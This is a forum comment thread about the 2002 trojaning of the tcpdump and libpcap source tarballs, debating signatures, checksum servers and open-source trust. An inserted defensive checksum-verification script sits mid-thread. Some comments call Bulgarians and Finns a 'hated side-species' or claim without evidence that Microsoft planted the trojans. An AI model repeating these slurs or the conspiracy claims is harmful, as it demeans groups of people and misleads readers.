MS isn't all the problem, idiots who don't patch up are also a problem (demonstrated by the continual code red attempts shown in my webserver logs), but at least when something goes wrong we hear about it, and can expect a solution shortly after discovery.
You said: "People using source for security who are in category 1 or 2 are fooling themselves."
Not quite. Here's why:
When you trust a binary, you are trusting the builder of that binary, the system on which it was built, AND the source of the source (i.e. the CVS repository or other ultimate source of the code, and all the source delivery mechanisms and servers like FTP). When you use the source directly, you remove one more trusted item from the list. Just like the builder of the binary, you trust the source of the source, but you build it on your own system, which supposedly you trust more than someone else's.
For projects that build and provide binaries directly, there may be some trust overlap between who is the builder of the binary and the source of the source.
I generally agree, however, that if you are in category 1 or 2, you are a fool to think you are totally safe. But it is NOT equal to users of binaries since you do remove a middleman of sorts that binary users must trust.
I guess he may be one of those poor sods who got their Unix sysadmin training through this.
"There are already a million monkeys on a million typewriters, and Usenet is NOTHING like Shakespeare." - Blair Houghton
Maybe somebody has already posted this idea as a project on sourceforge..
There have been too many of these incidents lately, and it's giving OSS a bad odor. We must be careful. Telling the rest of the world that closed binaries are infected often as well does not help. The damage is already done.
This is my idea to prevent most of these jokers' tricks.
Instead of placing the checksums next to the source on the same server, we need to place them somewhere safe. A number of centralized servers with the sole purpose of serving these sums, in several locations, on preferably different operating systems. This combined with the use of e.g. PGP.
All distros, for those who have not already, must apply a simple program à la portage and apt that checks against multiple PGP key servers before the build commences.
Now, how to make sure the admin of the project is the one signing the source on his machine...
Why are other people's sigs always more witty???
The discussion we started last night on the Gentoo bugs forum has some good information.
http://bugs.gentoo.org/show_bug.cgi?id=10663
Thanks again to Matt, Scott, and Bruce for the help doublechecking my work and posting the warning.
Demo / Russell
... Or you could join the Thawte web of trust and use S/MIME. The advantage there is that even if you do nothing more than sign up, your e-mail address is verified to belong to you. That alone is more rigorous verification than anything you're guaranteed with a PGP key. Get notarized twice, and your certificate can have your name in it, and those who get e-mail from you will know *exactly* what identity assurance the signature implies. The same can't be said of a signed PGP key. Plus with S/MIME, there is a key expiration mechanism, which ensures that the key can't (reasonably) be brute-forced before it becomes useless.
S/MIME support is also more widespread. Why does that matter? Because more folks would be in a position to verify the signature. If you put a link on a download page to an S/MIME message with a MIME type of message/rfc822, browsers that support S/MIME (at least Netscape, Mozilla, I believe IE) will verify the signature and display the contents with a nice "signed" icon. The contents of the message would be the MD5 sums of the files.
~~~
This is not the first time things like this have happened; MS has done this more than once! Open source is always a bit dangerous, because there is no one who is responsible for it. But what does MS do about it? The question is, who needs to protect us? Do we have to do it every time and every way? Or the distributor? The company who makes the code? Maybe we will need a community or committee for testing the source? :))
I think if I give you code I should check it before I give it to you! And I think this is the only way that can work!
People and companies who give out code with infections will write their name on the big black list... as happened with MS!
So? Who what?
There is only one good solution: the simplest!
The year rings a bell..
(a) The year of inauguration of the Apollo Space Program
(b) The year of the Afghan reconstitution
(c) Martin Luther King delivers the "I have a dream" speech.
Here
More here
The mantra of Open Source ("many eyes on the code") is nothing but marketspeak. In reality virtually no one ever looks at the code. Couple that with a development staff of the same people that write viruses and all of Open Source becomes one big time bomb.
This here is also interesting.
...well? Please release the info and name the bank and name the program. You are FOR crooks or AGAINST crooks, and releasing the info on this backdoor is a good thing to do. If it's really there, it most likely is *illegal*, so any sort of nondisclosure noise is null and void, AFAIK. You DON'T have to cover up illegalities; in fact you are supposed to report them. This bank and its bogus officers and "bosses" need to see the light of day in a fed courtroom.
Is there any tool to analyze source code as an antivirus scans a binary file?
For example, in this case, the program is running an external app and making changes to a system file.
This is the first kind of thing I would look for if I audited the code quickly.
we should divorce tcpdump.org and take half their money. at least that was my punishment when my wife found a Trojan in my car.
TRUSTED COMPUTING!
By locking up the code so no one will ever ever be able to see what it really is, then we can ENSURE that people get safe code that runs like a happy little gerbil! Yes!
It's not that simple. Sure, if all you're looking to do is execute some code and THEN give the user their expected interface, then that will work half-acceptably. However, you could not use this as a way to, say, discreetly intercept logins and passwords, transfer account balances, read someone's database, or what have you, since all of that requires you to intercept things and still provide the user with acceptable responses (at least if you wish to avoid detection for more than a couple of runs). Now you might attempt to come up with some elaborate scheme to act as an interactive go-between between the actual application and your trojan, but then you've greatly increased the complexity and the odds of detection.
No. There is a huge difference.
This is great, you've learned how to spin an argument.
Not only have you used the cliche "Well they aren't any better either...", you've even taken one step further and declared this weakness as your greatest strength.
Although to be an expert spin-meister you should have blamed this on Microsoft somehow. Work on it, get back to us. Maybe we can get you a job at the White House if the tech market continues to flounder.
..and the new 5.0 is SOOO secure
Wow,... the story made it almost an hour before someone blamed Microsoft!
"It takes considerable knowledge just to realize the extent of your own ignorance." - Thomas Sowell
Maybe I'm retarded, but the articles do not mention when they think the trojan was introduced. Does anyone know?
Download gpg from gnupg.org. Build it.
According to the GnuPG web site, building GnuPG on Windows 2000 requires a "special setup," which I take to mean Cygwin. I currently use MinGW because I have had trouble getting Cygwin to work. What OpenPGP compatible software package do you recommend for users of Windows operating systems?
Will I retire or break 10K?
Yeah.... that's why wiretapped.us redirects to wiretapped.net...
are either:
1) an ignorant fuckwit
or
2) a lying fuckwit
well, which one is it?
Microsoft, or some other group that has an ax to grind against Free and OSS, is behind these trojans.
The goal? To do this exact thing to the Linux kernel or perhaps the Samba project. They badly want to discredit Linux, and they will attempt to do so by any and all means. Call me paranoid, but what I say is true.
We must counter this life-threatening attack quickly or it will be a huge setback or perhaps the beginning of the end of free and OSS software.
That damn RPM format changes every other day.
My download from 9/28 2002 is okay.
tcpdump from 8/29 is good too.
Check this post to the netbsd-users mailing list (emphasis mine) :
From: David Maxwell
To: Stefan Schumacher
Cc: netbsd-users@netbsd.org
Subject: Re: Trojans in libpcap and tcpdump
Date: Wed, 13 Nov 2002 14:39:05 -0500
Sender: netbsd-users-owner@netbsd.org
User-Agent: Mutt/1.4i
On Wed, Nov 13, 2002 at 06:52:38PM +0100, Stefan Schumacher wrote:
> Hi there,
>
> report was given that trojans were detected in libpcap and tcpdump.
>
> http://hlug.fscker.com/
>
> I fetched tcpdump and libpcap and took a look in the sources, seems so as
> if we IMHO are not affected.
That is correct.
I've been at the console of the tcpdump.org server today, working with
Michael Richardson to investigate the problem. He will release a
statement on the details at some point. The system was not running an
up to date version of NetBSD, so there is no indication that users with
up to date systems are vulnerable to some new bug.
The trojan was installed within the last two days. The signatures in
pkgsrc are eight _months_ old. Users installing from pkgsrc (source, or
binary packages) could not be affected by this trojan without
specifically overriding the incorrect signature on the distribution
file.
Michael's contact information is listed in the whois entry for the
tcpdump.org domain, but as far as I know, he did not receive a call
about this issue, it was slashdotted.
--
Now if every open source developer had something along the following outline in their crontab...
ftp sources from the ftp distribution server, diff against a known good copy, mail if different
Maybe not practical for the biggest projects, but for the rest?
Idea 2 - responsible mirroring
Mirrors shouldn't accept changed sources without an accompanying bump in the version/release number in the filename; this would make it much easier to spot trojaned versions.
Okay, that relies on developers being careful to bump the release no. after every change (doc updates etc.).
"Linux is a serious competitor"
- Steve Ballmer, Chief Executive Microsoft Corp.
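The two ideas above (checksums served from a host independent of the download server, as proposed earlier in the thread, and a periodic job that compares what the distribution server currently serves against a retained known-good copy and flags a replacement that carries no version bump) combined in one small script. This is an added illustration, not code from the thread or from the tcpdump project; the tarball bytes, filenames and manifest are constructed samples, and sha256 stands in for the md5sum of the day.

```python
import hashlib
import hmac

def sha256_hex(data: bytes) -> str:
    """Digest used for the manifest (the thread used md5sum; sha256 today)."""
    return hashlib.sha256(data).hexdigest()

def build_manifest(files: dict) -> str:
    """Publisher side: sha256sum-style lines ('<hex>  <name>') meant to be
    hosted on a server independent of the one serving the tarballs."""
    return "".join(f"{sha256_hex(d)}  {n}\n" for n, d in sorted(files.items()))

def parse_manifest(text: str) -> dict:
    """Consumer side: parse the out-of-band manifest into {name: hex digest}."""
    entries = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        digest, sep, name = line.partition("  ")
        if not sep or len(digest) != 64:
            raise ValueError(f"malformed manifest line: {line!r}")
        entries[name] = digest.lower()
    return entries

def verify_download(name: str, data: bytes, manifest: dict) -> tuple:
    """Return (ok, message). A file the manifest never listed is refused too:
    nobody has vouched for it, so it must not reach the build step."""
    expected = manifest.get(name)
    if expected is None:
        return False, f"REJECT {name}: not listed in out-of-band manifest"
    actual = sha256_hex(data)
    if not hmac.compare_digest(actual, expected):
        return False, f"REJECT {name}: digest {actual[:12]} != manifest {expected[:12]}"
    return True, f"OK {name}"

def watch_for_replacement(current: dict, known_good: dict) -> list:
    """The crontab idea: compare what the server serves now (name -> bytes)
    with digests of the copies kept from the last run.  The same filename
    with a different digest means contents were replaced without a version
    bump; that is the case to mail about."""
    alerts = []
    for name, data in sorted(current.items()):
        if name not in known_good:
            alerts.append(f"NEW {name}: new filename, needs a manifest entry before use")
        elif sha256_hex(data) != known_good[name]:
            alerts.append(f"CHANGED {name}: contents replaced under the same filename")
    for name in sorted(set(known_good) - set(current)):
        alerts.append(f"MISSING {name}: no longer served")
    return alerts

# Constructed sample data standing in for real distribution files.
NAME = "tcpdump-X.Y.tar.gz"
GOOD_TARBALL = b"constructed placeholder for the release tarball\n"
REPLACED_TARBALL = GOOD_TARBALL + b"# constructed: extra bytes under the same filename\n"

def demo() -> dict:
    """Run both checks against the constructed samples and return the outcome."""
    manifest = parse_manifest(build_manifest({NAME: GOOD_TARBALL}))  # served elsewhere
    good_ok, _ = verify_download(NAME, GOOD_TARBALL, manifest)
    bad_ok, bad_msg = verify_download(NAME, REPLACED_TARBALL, manifest)
    known_good = {NAME: sha256_hex(GOOD_TARBALL)}          # kept from the last run
    served_now = {NAME: REPLACED_TARBALL, "tcpdump-X.Z.tar.gz": b"constructed next release\n"}
    return {"good_ok": good_ok, "bad_ok": bad_ok, "bad_msg": bad_msg,
            "alerts": watch_for_replacement(served_now, known_good)}

if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```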
We contacted Joseph Shaw, who did the web design for the site, and he tried many times to make contact. The trojan was found about 11:15pm; by 12:45 Joe was trying to contact Michael Richardson. Given that this was not an exploit but a trojan, it seemed best to report it rather than keep it hidden.
Bulgarians are not Russians, they are Bulgarians, a very hated side-species of humankind.
Because Finns are as bad as Bulgarians, and are the second most hated side-species of humankind.
I've been looking for something like this for a while: interactive security policy management of sandboxed applications. Upon cursory inspection, it looks like it only works with userspace syscalls, but I imagine that should do the trick 99% of the time (unless a nefarious kernel module is installed or the app can somehow access hardware directly?).
I'm hoping someone will make a console frontend... or maybe I will once I learn enough.
I've actually been worried about switching to linux for a while due to security reasons (namely that it seems to require an insane amount of diligence to maintain a secure system which changes dynamically -- i.e. trying out new apps all the time)... and oftentimes, apps need to be installed as root, which has no restrictions upon the powers given to the new program.
LIDS, LOMAC, etc. seem to require much prior consideration of policies (which, ideally, should be dictated by the creators of the program and/or by the major distributions, only to be inspected by the user or limited by the user's own global policies). BTW: is there any program to convert between the policies established for the different security systems?
I am constantly trying out new software, and if I can't sandbox it even a bit (like ZoneAlarm interactively protecting net connections or Secure4U for Windows) then it's not worth it.
Thanks again.
Because there only needs to be *one* person out there who *does* look at the diffs and catches the thing. *Not* every person needs to catch the thing.
Furthermore, analysis of what the thing is doing is much easier with open source.
May we never see th
Apparently, it was less than one day.
As someone else pointed out, the closed-source Interbase (DBMS) contained a trojan for over six years which was only found after it was open-sourced.
May we never see th
All the replying posts pointing out that it's a phone company/ISP and it's almost certainly nothing to do with this chap are at 2 or below, meaning that many people won't see them and this individual's name is now besmirched.
The sad part of this is the fact that we (people who have moderator points to give away) can't really fix the problem even after we're told about it. I could go back and mod down the misleading post, but then some metamoderator would see that I modded down what appears at face value to be an "interesting" post and I would be the one who was bitch-slapped for abusing my moderator points. All we can really do is mod up the replies, making the whole thread +5 in order to dilute the bad moderation.
...don't understand the ins and outs of Trojans (another joke). But why would you want to spend time writing flames for people who don't share your own brand of uber-geekery? Presumably those of us who spend time here do so in pursuit of some nerdy interest of our own.
Making trouble today for a better tomorrow...
According to OpenBSD Journal, OpenBSD is not affected. NOT AT ALL!!!
- Pcap and Tcpdump are brought in only periodically and after a thorough code review.
- OpenBSD rolls its own build system (for pcap and tcpdump).
The trojan affected the configure script and was activated at build time.
I Love OpenBSD!!!
Go to gnupg.org and install gpg. Generate a keypair and put your public key up on wwwkeys.pgp.net. Whenever you meet another developer, sign each others keys. When you release a tarball, FUCKING SIGN IT and put up instructions telling people how to verify it. This sort of thing does not have to happen. The tools are there to prevent anyone ever trojaning an FTP server again. You will have to do this eventually or no one will trust your server enough to download your software, so why not start now? GO AND FUCKING START.
</rant>
Sorry about that, but how many times does this have to happen? It's trivial to prevent, but most people don't even try. Go and damn well start!
...has just been knocked-down in reliability by SOMEONE FROM WITHIN THEIR OWN GROUP?!?!
I'm sorry, but I'm sitting here and having a (small) chuckle at the people who constantly attacked Microsoft for not being "secure" - people who now have (probably) been compromised (again) by someone (hopefully not) within the Open Source community, or at least someone who gained sufficient access to the source code to insert their code. From what I've read so far, this seems to have been a fairly trivial thing for the "infiltrator" to accomplish.
First, there were the trojanized versions of OpenSSH, BitchX, dsniff and a few other tools. Now, we have trojanized versions of some fairly non-trivial tools. What's next? Who knows? No one does.
The really funny thing is that because of its own charter and design, the Open Source community has created its own FUD about its own products. Let's all hope that they take the initiative to prevent such things from happening again. Remember: "Fool me once, shame on you... fool me twice, shame on me... fool me five times and someone please kick me in the head!"
The really excellent thing about this happening is that the Open Source community got together, spread the info about the trojan/exploit rapidly and did an excellent job of damage control. The people that found the trojan (http://www.hlug.org) should be commended for their dedication to checking source code - something that should have happened (IMHO) quite a way up the development chain. Unfortunately, it appears that due to the very nature of Open Source development (i.e. the ability of pretty much ANYONE to contribute source code to the development tree and even have it included in the latest CVS) this will not be the last "event" concerning compromised source code - unless the Open Source development community seriously reworks their development cycle and includes exhaustive source code review before ANY source code is released for "public" consumption.
ScottKin
I don't give a rat's behind about "karma" here or anywhere else. Don't like what I have to say here? Deal with it!
Why is Gentoo safe? How about Red Hat and Mandrake? Are those safe? If not, how can I fix it? Please email me at gigsvoo@yahoo.com, thanks a lot!
Thanks
Neo Gigs
"Follow the white rabbit..."
The Analytical Engine weaves Algebraical patterns just as the Jacquard
loom weaves flowers and leaves.
-- Ada Augusta, Countess of Lovelace, the first programmer
- this post brought to you by the Automated Last Post Generator...